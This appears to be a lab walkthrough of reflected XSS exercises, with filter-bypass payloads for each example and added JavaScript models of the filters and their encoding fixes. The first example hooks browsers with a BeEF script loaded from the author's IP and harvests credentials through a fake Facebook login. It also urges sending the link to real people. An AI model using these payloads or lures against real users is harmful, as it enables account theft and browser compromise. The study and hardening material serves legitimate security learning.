Cross-site Scripting (XSS) is a client-side code injection attack. There are three types of XSS:
1- Reflected XSS
2- Stored XSS
3- DOM XSS
With it we can execute malicious JavaScript in the victim's browser, for example to steal cookies or to redirect the victim anywhere we like.
Example1
In Example1, the first thing I tried was injecting an <a> tag. I saw that the input is printed directly into the page without any encoding. After that I injected a simple malicious script, <script>alert(1)</script>, and got the alert box shown below:

What more can we do after that? Have you ever heard of BeEF, the Browser Exploitation Framework (packaged as beef-xss)? Let's inject its hook.js and see what it gives us.
Open a terminal on your favourite pentesting OS (I'm using ParrotOS here) and type:
beef-xss

As you can see above, the program gives you the hook script tag and the address of its web UI. When you open the web UI it asks for a username and password; the defaults are beef / beef. The only thing left to do is inject the script tag that beef-xss has given you.
I edited it with my own IP address and URL-encoded it so that it is not obvious at a glance what it does. You can find a URL encoder online, or just use Burp Suite's Decoder tab for it. Keep in mind that URL encoding only hides the payload from a casual look: the server decodes it before the page ever sees it, so on its own it does not get past any filter.
.%3Cscript%20src%3D%22http%3A%2F%2F192.168.1.30%3A3000%2Fhook.js%22%3E%3C%2Fscript%3E
Only one thing remains now: you have to send the link to someone.

Let's assume I sent the link to someone, they copied it into the browser's address bar and pressed Enter. That's it; the browser is hooked.

Once you have hooked someone you can use the modules under the Commands tab. For instance, BeEF can show the victim a fake Facebook login prompt to harvest credentials, as below.


After the victim types their Facebook credentials into it, BeEF hands them straight to you.

Most people have no idea what XSS is, so most of them will click the link you send. By the way, you don't have to use BeEF for this. You can also build a fake web page and put a payload like the following into the vulnerable field, which opens your page in a new tab:
<script>window.open('http://fakewebpage.com', '_blank');</script>
In the next examples I won't use BeEF. I'll just write the payloads and take screenshots.
Example2
For this example, just type <script> and check what it turns into.

I typed the script tags and saw them disappear from the output, which suggests the coder wrote something like:
<?php
$name = $_GET['name'];
$name = preg_replace("/<script>/", "", $name);
$name = preg_replace("/<\/script>/", "", $name);
echo $name;
?>
So I tried injecting the script with a small change. If you look at the code we guessed, it only checks whether the exact lowercase <script> and </script> tags exist. Make one letter uppercase in both tags and see the result below:

Example3
In this example I typed the previous payload and saw that this time the check is better.

The code might be like:
<?php
$name = $_GET['name'];
$name = preg_replace("/<script>/i", "", $name);
$name = preg_replace("/<\/script>/i", "", $name);
echo $name;
?>
The "i" modifier makes the match case-insensitive, so changing the case of the tag no longer helps.
To bypass it we can use an <img> tag or other elements. But if you'd like to use script tags anyway, write them like this:
<scr<script>ipt>alert(1)</scr</script>ipt>
The filter removes the tags in a single pass and never looks at the result again: when it deletes the inner <script> and </script>, the pieces we typed around them are merged back into a complete <script>alert(1)</script>.

Example4
When we type <script>, and also when we type only the word script, it gives an error:

So the code should be something like:
<?php
$name = $_GET['name'];
if (preg_match("/script/i", $name)) {
    return "error";
}
echo $name;
?>
To bypass this we can use other elements, like an <img> tag with an event handler, since the word "script" never appears in them.

Example5
In this example I tried to inject <script> tags with the alert function and got an error. But when I removed the alert call, there was no error. So we can understand that the coder is only checking for the alert function. The code might be like:
<?php
$name = $_GET['name'];
if (preg_match("/alert/", $name)) {
    return "error";
}
echo $name;
?>
To bypass it we can use another function that is just as useful. For example, say you created a page that steals passwords or something similar; you can redirect the victim to it:
<script>window.location.replace('http://www.fakewebpage.com');</script>
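The four guessed filters from Examples 2 to 5, as an added JavaScript example (this is not the lab's code, which is PHP and was only guessed at above): each filter is a function, and the bypass payload for it from the walkthrough is pushed through to confirm that what comes out still contains something a browser would execute. JavaScript's String.replace with a global regex behaves like preg_replace for these patterns, and the i flag means the same in both. The stillExecutable check is a rough heuristic written for this example, not an HTML parser.

```javascript
// Added example, not from the original post: the filters guessed in
// Examples 2-5 modelled in JavaScript, with the bypass payload for each.

// Example 2 guess: strip the exact lowercase tags. Case-sensitive, single pass.
function filterExample2(name) {
  return name.replace(/<script>/g, "").replace(/<\/script>/g, "");
}

// Example 3 guess: the same, but with the i flag, so case no longer matters.
function filterExample3(name) {
  return name.replace(/<script>/gi, "").replace(/<\/script>/gi, "");
}

// Example 4 guess: reject the whole input if "script" appears in any case.
function filterExample4(name) {
  return /script/i.test(name) ? "error" : name;
}

// Example 5 guess: reject the whole input if "alert" appears.
function filterExample5(name) {
  return /alert/.test(name) ? "error" : name;
}

// Rough heuristic for this example only: would a browser run anything in
// this markup? True for a <script> element or an inline on* event handler.
function stillExecutable(html) {
  return /<script\b/i.test(html) || /<\w+[^>]*\son\w+\s*=/i.test(html);
}

// One bypass per filter, taken from the walkthrough above.
const bypasses = [
  // Ex. 2: the filter is case-sensitive, so one uppercase letter slips past it.
  { name: "example2", filter: filterExample2, payload: "<Script>alert(1)</Script>" },
  // Ex. 3: the tags are removed in a single pass; what is left re-forms <script>.
  { name: "example3", filter: filterExample3, payload: "<scr<script>ipt>alert(1)</scr</script>ipt>" },
  // Ex. 4: no "script" substring at all: another element with an event handler.
  { name: "example4", filter: filterExample4, payload: "<img src=x onerror=alert(1)>" },
  // Ex. 5: "alert" is blocked, so call a different function instead.
  { name: "example5", filter: filterExample5,
    payload: "<script>window.location.replace('http://www.fakewebpage.com')</script>" },
];

// Returns, for each case, what the filter emitted and whether it still runs.
function checkBypasses() {
  return bypasses.map(({ name, filter, payload }) => {
    const out = filter(payload);
    return { name, out, bypassed: stillExecutable(out) };
  });
}

// The same filters do stop the naive payload, which is why the walkthrough
// had to adapt it for every example.
function checkNaivePayload() {
  const naive = "<script>alert(1)</script>";
  return [filterExample2, filterExample3, filterExample4, filterExample5]
    .map((f) => stillExecutable(f(naive)));
}

for (const r of checkBypasses()) console.log(r.name, r.bypassed, r.out);
```

Run it with node; each line prints the example name, true, and the markup that survived the filter. The lesson the four cases share is that a blocklist on the input is fragile; the robust fix is to encode the value for the context it is printed into, which the later examples on this page get closer to.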


Example6
The examples are getting a little harder. Here the coder did something different: our payload lands inside a script block that is already open, as the value of a JavaScript string. So we need to shape the payload as if we were already inside that string.
Whatever we type is appended to the end of the value of var $a.
To bypass it, I first closed the quotes and then added a new statement with alert on the same line.
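Example 6 in working form, as an added example that is not the lab's code: the template below (var $a inside an open <script>) is an assumption of what the page renders, based on the description above. It shows the breakout payload, then the hardening a developer should apply for this context: emit a real JavaScript string literal via JSON.stringify and escape < and > so the value can neither terminate the string nor close the <script> element. The script body is evaluated with new Function, with alert replaced by a recorder, to stand in for the browser.

```javascript
// Added example, not from the original post. Assumed page shape for
// Example 6: the reflected value is the body of a JavaScript string literal
// inside an already-open <script> block.

// Vulnerable: the raw value is concatenated into the string literal.
function renderVulnerable(name) {
  return '<script>var $a="' + name + '";</script>';
}

// Hardened: emit a proper JS string literal. JSON.stringify escapes quotes
// and backslashes; < and > are escaped as well so that a value containing
// "</script>" cannot close the element (JSON.stringify leaves "/" alone).
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, "\\u003c")
    .replace(/>/g, "\\u003e");
}
function renderHardened(name) {
  return "<script>var $a=" + jsStringLiteral(name) + ";</script>";
}

// The breakout from the walkthrough: close the string, end the statement,
// add our own statement, then comment out the rest of the original line.
const breakout = '";alert(1);//';

// Stand-in for the browser: take the script body, run it with a recording
// alert(), and report what alert() saw and what $a ended up holding.
function runAsBrowserWould(html) {
  const body = html.slice("<script>".length, -"</script>".length);
  const calls = [];
  // The newline matters: a trailing "//" in the payload would otherwise
  // comment out the return statement too.
  const fn = new Function("alert", body + "\nreturn $a;");
  const aValue = fn((x) => calls.push(x));
  return { alertCalls: calls, aValue };
}

// How many closing </script> tags does the markup contain? Anything above
// one means the value was able to break out of the element.
function closingScriptTags(html) {
  return html.split("</script>").length - 1;
}

console.log(runAsBrowserWould(renderVulnerable(breakout)));
console.log(runAsBrowserWould(renderHardened(breakout)));
```

On the vulnerable template the recorder sees alert(1) and $a ends up empty; on the hardened one nothing is called and $a holds the payload as plain text. In PHP the equivalent of jsStringLiteral is json_encode() with JSON_HEX_TAG, JSON_HEX_QUOT and JSON_HEX_APOS.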

Example7

I typed only <script> and the tags came back as &lt; and &gt;. The coder added the htmlentities() function for protection. But again you can bypass it. Here are some of the characters that htmlentities() encodes:
- <
- >
- "
- £
- &
It covers the characters above, but with its default flags it does not encode the single quote. So we can inject our payload again by using single quotes instead. (This is the behaviour of the old default flag set, ENT_COMPAT; with ENT_QUOTES, which is the default since PHP 8.1, the single quote is encoded as well.)

Example8

When I type <script>, the form uses the POST method to pass the value to a PHP file and treats it as a plain string. This example is a little harder. But there is a small trick here: go to the address bar and add something to the end of "example8.php". You'll see what changes.

As you can see above, what you add to the path is reflected inside the form tag. So just close the action attribute and type your payload there.

When the mouse moves over the form area the payload runs. This method is quite useful; keep it in mind.
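Examples 7 and 8 are both injections into an HTML attribute, so one added JavaScript example covers them (this is not the lab's code; the page shapes below are assumptions based on the descriptions above). htmlentitiesCompat models PHP's htmlentities() with its old default flags, which leave the single quote alone, and htmlentitiesQuotes models ENT_QUOTES. For Example 8 the assumption is that the form action echoes the request path unencoded, which in PHP is typically $_SERVER['PHP_SELF']. A small quote-aware attribute tokenizer, written for this example, decides whether an on* handler ended up as a real attribute rather than as text inside a value.

```javascript
// Added example, not from the original post: the attribute-context
// injections of Examples 7 and 8, with the encoding that stops each one.

// Model of PHP htmlentities() under its old default flags (ENT_COMPAT):
// encodes & < > and the double quote, but not the single quote.
function htmlentitiesCompat(s) {
  return String(s)
    .replace(/&/g, "&amp;").replace(/</g, "&lt;")
    .replace(/>/g, "&gt;").replace(/"/g, "&quot;");
}

// Model of ENT_QUOTES (the default since PHP 8.1): the single quote too.
function htmlentitiesQuotes(s) {
  return htmlentitiesCompat(s).replace(/'/g, "&#039;");
}

// No encoding at all, for the raw Example 8 page.
const raw = (s) => s;

// Assumed page shape for Example 7: the value lands in a single-quoted attribute.
function renderExample7(name, encode) {
  return "<input type='text' name='name' value='" + encode(name) + "'>";
}

// Assumed page shape for Example 8: the form action echoes the request path.
function renderExample8(requestPath, encode) {
  return '<form action="' + encode(requestPath) + '" method="POST">' +
         '<input type="text" name="name"></form>';
}

// Quote-aware attribute tokenizer for the first tag in the markup. Text inside
// a quoted value is not reported as an attribute name, which is exactly the
// difference between a neutralised payload and a live one.
function attributeNames(html) {
  const inside = html.match(/<\w+([^>]*)>/)[1];
  const re = /\s+([^\s=>]+)(?:\s*=\s*(?:"[^"]*"|'[^']*'|[^\s>]+))?/g;
  const names = [];
  let m;
  while ((m = re.exec(inside)) !== null) names.push(m[1].toLowerCase());
  return names;
}
function hasEventHandler(html) {
  return attributeNames(html).some((n) => n.startsWith("on"));
}

// Payloads from the walkthrough. Example 7 breaks out with a single quote;
// Example 8 appends to the path and closes the double-quoted action attribute.
const payload7 = "' onmouseover='alert(1)";
const payload8 = '/example8.php/" onmouseover="alert(1)';

// true means the handler became a real attribute and would fire on hover.
function demo() {
  return {
    ex7Compat: hasEventHandler(renderExample7(payload7, htmlentitiesCompat)),
    ex7Quotes: hasEventHandler(renderExample7(payload7, htmlentitiesQuotes)),
    ex8Raw: hasEventHandler(renderExample8(payload8, raw)),
    ex8Encoded: hasEventHandler(renderExample8(payload8, htmlentitiesCompat)),
  };
}

console.log(demo());
```

Running it prints ex7Compat and ex8Raw as true and the two encoded variants as false. The point of pairing the two examples is that the same rule fixes both: every value printed into an attribute, including the script's own path, goes through an encoder that covers whichever quote character delimits that attribute.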
That's all, thanks for reading! See you soon!

